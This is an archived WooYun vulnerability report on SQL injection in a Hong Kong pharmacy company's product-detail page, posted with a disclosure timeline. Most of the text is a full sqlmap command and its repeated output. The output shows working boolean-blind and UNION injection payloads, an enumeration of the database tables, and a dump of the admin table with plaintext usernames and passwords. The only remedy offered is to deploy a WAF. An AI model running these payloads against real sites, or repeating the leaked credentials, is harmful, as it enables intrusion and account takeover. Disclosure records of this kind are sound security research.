乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-20: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
忠信中西大藥房有限公司某處存在SQL植入攻擊(可獲取admin明文密碼)
地址:http://**.**.**.**/tc/product-detail.php?cid=1&id=357
python sqlmap.py -u "http://**.**.**.**/tc/product-detail.php?cid=1&id=357" -p cid --technique=BU --random-agent -D chungshu_db1 -T backend_user -C user_id,login,password --dump
---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1' AND 8767=8767 AND 'UHsF'='UHsF&id=357 Type: UNION query Title: MySQL UNION query (29) - 4 columns Payload: cid=-2577' UNION ALL SELECT 29,29,29,CONCAT(0x716a626271,0x427a4749676e5a7779584b695243795959727645544a4d6d73694b51464e4d6641566a6d694e776f,0x717a7a7071)#&id=357---web application technology: PHP 5.3.29, Apache 2.2.27back-end DBMS: MySQL >= 5.0.0current user: 'chungshu_user1@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'chungshu_user1'@'localhost'Database: chungshu_db1+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| attachment | 2389 || product | 486 || product_category | 6 || backend_user | 2 || setting | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 436 || GLOBAL_STATUS | 296 || SESSION_STATUS | 296 || GLOBAL_VARIABLES | 279 || SESSION_VARIABLES | 279 || COLLATION_CHARACTER_SET_APPLICABILITY | 130 || COLLATIONS | 129 || PARTITIONS | 38 || TABLES | 38 || CHARACTER_SETS | 36 || SCHEMA_PRIVILEGES | 18 || PLUGINS | 10 || ENGINES | 8 || KEY_COLUMN_USAGE | 5 || STATISTICS | 5 || TABLE_CONSTRAINTS | 5 || SCHEMATA | 2 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:sqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1' AND 8767=8767 AND 'UHsF'='UHsF&id=357 Type: UNION query Title: MySQL UNION query (29) - 4 columns Payload: cid=-2577' UNION ALL SELECT 29,29,29,CONCAT(0x716a626271,0x427a4749676e5a7779584b695243795959727645544a4d6d73694b51464e4d6641566a6d694e776f,0x717a7a7071)#&id=357---web application technology: PHP 5.3.29, Apache 2.2.27back-end DBMS: MySQL 5columns LIKE 'pass' were found in the following databases:sqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1' AND 8767=8767 AND 'UHsF'='UHsF&id=357 Type: UNION query Title: MySQL UNION query (29) - 4 columns Payload: cid=-2577' UNION ALL SELECT 29,29,29,CONCAT(0x716a626271,0x427a4749676e5a7779584b695243795959727645544a4d6d73694b51464e4d6641566a6d694e776f,0x717a7a7071)#&id=357---web application technology: PHP 5.3.29, Apache 2.2.27back-end DBMS: MySQL 5available databases [2]:[*] chungshu_db1[*] information_schemasqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1' AND 8767=8767 AND 'UHsF'='UHsF&id=357 Type: UNION query Title: MySQL UNION query (29) - 4 columns Payload: cid=-2577' UNION ALL SELECT 29,29,29,CONCAT(0x716a626271,0x427a4749676e5a7779584b695243795959727645544a4d6d73694b51464e4d6641566a6d694e776f,0x717a7a7071)#&id=357---web application technology: PHP 5.3.29, Apache 2.2.27back-end DBMS: MySQL 5Database: chungshu_db1Table: attachment[3 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| category_id | numeric || table_name | non-numeric || user_id | numeric |+-------------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1' AND 8767=8767 AND 'UHsF'='UHsF&id=357 Type: UNION query Title: MySQL UNION query (29) - 4 columns Payload: cid=-2577' UNION ALL SELECT 29,29,29,CONCAT(0x716a626271,0x427a4749676e5a7779584b695243795959727645544a4d6d73694b51464e4d6641566a6d694e776f,0x717a7a7071)#&id=357---web application technology: PHP 5.3.29, Apache 2.2.27back-end DBMS: MySQL 5Database: chungshu_db1Table: backend_user[4 columns]+----------+-------------+| Column | Type |+----------+-------------+| group_id | numeric || login | non-numeric || password | non-numeric || user_id | numeric |+----------+-------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1' AND 8767=8767 AND 'UHsF'='UHsF&id=357 Type: UNION query Title: MySQL UNION query (29) - 4 columns Payload: cid=-2577' UNION ALL SELECT 29,29,29,CONCAT(0x716a626271,0x427a4749676e5a7779584b695243795959727645544a4d6d73694b51464e4d6641566a6d694e776f,0x717a7a7071)#&id=357---web application technology: PHP 5.3.29, Apache 2.2.27back-end DBMS: MySQL 5Database: chungshu_db1Table: backend_user[2 entries]+---------+-------+----------+| user_id | login | password |+---------+-------+----------+| 1 | admin | 222999 || 2 | tom | tom123 |+---------+-------+----------+
上WAF。
危害等级:中
漏洞Rank:5
确认时间:2015-11-24 12:21
Referred to related parties.
暂无
